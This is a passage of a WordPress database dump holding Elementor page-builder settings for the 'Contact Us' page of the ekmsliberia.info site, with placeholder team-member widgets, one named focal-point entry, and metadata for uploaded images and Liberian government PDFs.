contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2300,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-13.jpg\"},\"member_first_name\":\"John\",\"member_last_name\":\"Borthwick\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"29325d60\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7cf8d6a3\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2301,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-14.jpg\"},\"member_first_name\":\"Mary\",\"member_last_name\":\"Scott\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"flex-start\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"5ac7adf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7fc35fde\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2302,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-15.jpg\"},\"member_first_name\":\"David\",\"member_last_name\":\"Anderson\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false},{\"id\":\"b70c70a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"44e5b7f1\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2303,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/team-16.jpg\"},\"member_first_name\":\"Tom\",\"member_last_name\":\"Allen\",\"member_position\":\"Founder & CEO\",\"member_description\":\"Lorem ipsum dolor sit amet conse ctetur adipisicing elit, sed do eiusmod tempor incididunt.\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto Condensed\",\"position_typography_font_style\":\"italic\",\"position_margin\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"position_alignment\":\"flex-start\",\"position_text_alignment\":\"right\",\"desc_color\":\"#777777\",\"desc_typography_typography\":\"custom\",\"desc_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"desc_typography_font_family\":\"Roboto Condensed\",\"desc_typography_font_weight\":\"400\",\"desc_margin\":{\"unit\":\"px\",\"top\":\"8\",\"right\":\"0\",\"bottom\":\"3\",\"left\":\"0\",\"isLinked\":false},\"desc_text_alignment\":\"left\",\"button_alignment\":\"left\",\"button_bg_color\":\"#23ccc3\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"button_typography_font_family\":\"Oswald\",\"button_typography_font_weight\":\"700\",\"button_typography_text_transform\":\"uppercase\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"30\",\"bottom\":\"19\",\"left\":\"30\",\"isLinked\":false},\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"primary_button_hover_bg_color\":\"#333333\",\"last_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"container_background_image\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"container_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"container_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"container_background_slideshow_gallery\":[],\"overlay_background_image\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"overlay_background_slideshow_gallery\":[],\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_slideshow_gallery\":[],\"_background_hover_image\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_background_hover_slideshow_gallery\":[]},\"elements\":[],\"widgetType\":\"jet-team-member\"}],\"isInner\":false}],\"isInner\":false}]'),(14555,2308,'_elementor_controls_usage','a:5:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:3:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}s:14:\"section_layout\";a:1:{s:3:\"gap\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:15:\"jet-team-member\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:7;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:15:\"section_content\";a:7:{s:12:\"member_image\";i:4;s:15:\"member_position\";i:4;s:18:\"member_description\";i:4;s:11:\"social_list\";i:4;s:11:\"button_text\";i:4;s:17:\"member_first_name\";i:3;s:16:\"member_last_name\";i:3;}}s:5:\"style\";a:5:{s:30:\"section_team_member_name_style\";a:10:{s:32:\"first_name_typography_typography\";i:4;s:31:\"first_name_typography_font_size\";i:4;s:33:\"first_name_typography_font_family\";i:4;s:36:\"first_name_typography_letter_spacing\";i:4;s:31:\"last_name_typography_typography\";i:4;s:30:\"last_name_typography_font_size\";i:4;s:32:\"last_name_typography_font_family\";i:4;s:11:\"name_margin\";i:4;s:19:\"name_text_alignment\";i:4;s:35:\"last_name_typography_letter_spacing\";i:4;}s:34:\"section_team_member_position_style\";a:8:{s:14:\"position_color\";i:4;s:30:\"position_typography_typography\";i:4;s:29:\"position_typography_font_size\";i:4;s:31:\"position_typography_font_family\";i:4;s:30:\"position_typography_font_style\";i:4;s:15:\"position_margin\";i:4;s:18:\"position_alignment\";i:4;s:23:\"position_text_alignment\";i:4;}s:30:\"section_team_member_desc_style\";a:7:{s:10:\"desc_color\";i:4;s:26:\"desc_typography_typography\";i:4;s:25:\"desc_typography_font_size\";i:4;s:27:\"desc_typography_font_family\";i:4;s:27:\"desc_typography_font_weight\";i:4;s:11:\"desc_margin\";i:4;s:19:\"desc_text_alignment\";i:4;}s:27:\"section_action_button_style\";a:11:{s:16:\"button_alignment\";i:4;s:15:\"button_bg_color\";i:4;s:28:\"button_typography_typography\";i:4;s:27:\"button_typography_font_size\";i:4;s:29:\"button_typography_font_family\";i:4;s:29:\"button_typography_font_weight\";i:4;s:32:\"button_typography_text_transform\";i:4;s:32:\"button_typography_letter_spacing\";i:4;s:14:\"button_padding\";i:4;s:20:\"button_border_radius\";i:4;s:29:\"primary_button_hover_bg_color\";i:4;}s:33:\"section_team_member_general_style\";a:1:{s:16:\"container_margin\";i:3;}}}}}'),(14560,2309,'_elementor_controls_usage','a:0:{}'),(14561,2309,'by','Government of Liberia'),(14562,2309,'year','2018'),(14563,2309,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf'),(14564,2309,'_pods_cover_image','a:1:{i:0;i:573;}'),(14570,2309,'_dp_original','2159'),(14571,2309,'_edit_lock','1670325093:42'),(14579,2309,'_edit_last','42'),(14580,2311,'_wp_attached_file','2019/11/State-of-the-Environment-2006-Liberia-1.pdf'),(14581,2312,'_wp_attached_file','2019/11/PAPD-pro-poor-agenda-for-prosperity-and-development.pdf'),(14583,2309,'_pods_attached_document','a:1:{i:0;i:2312;}'),(14586,2313,'_wp_attached_file','2019/11/knowledge_broker_DC.jpg'),(14587,2313,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:31:\"2019/11/knowledge_broker_DC.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_DC-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_DC-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"SM-N960U\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573820830\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:16:\"0.03030303030303\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14588,2314,'_elementor_edit_mode','builder'),(14589,2314,'_elementor_template_type','wp-page'),(14590,2314,'_elementor_version','2.7.5'),(14591,2314,'_wp_page_template','default'),(14592,2314,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d9704de\",\"elType\":\"section\",\"settings\":{\"gap\":\"extended\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"105\",\"right\":\"0\",\"bottom\":\"85\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"_id\":\"997f017\"}]},\"elements\":[{\"id\":\"75f1af0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1eb2394d\",\"elType\":\"widget\",\"settings\":{\"member_image\":{\"id\":2313,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\"},\"member_first_name\":\"J.S. Datuama\",\"member_last_name\":\"Cammue\",\"member_position\":\"UNCBD Focal Point\",\"member_description\":\"\",\"social_list\":[{\"social_icon\":\"\",\"social_label\":\"\",\"social_link\":\"\",\"label_visible\":\"false\",\"_id\":\"fmh0jib\",\"selected_social_icon\":{\"value\":\"\",\"library\":\"\"}}],\"button_text\":\"Learn more\",\"first_name_typography_typography\":\"custom\",\"first_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"first_name_typography_font_family\":\"Oswald\",\"first_name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"last_name_typography_typography\":\"custom\",\"last_name_typography_font_size\":{\"unit\":\"px\",\"size\":20},\"last_name_typography_font_family\":\"Oswald\",\"name_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"name_text_alignment\":\"left\",\"position_color\":\"#23ccc3\",\"position_typography_typography\":\"custom\",\"position_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"position_typography_font_family\":\"Roboto 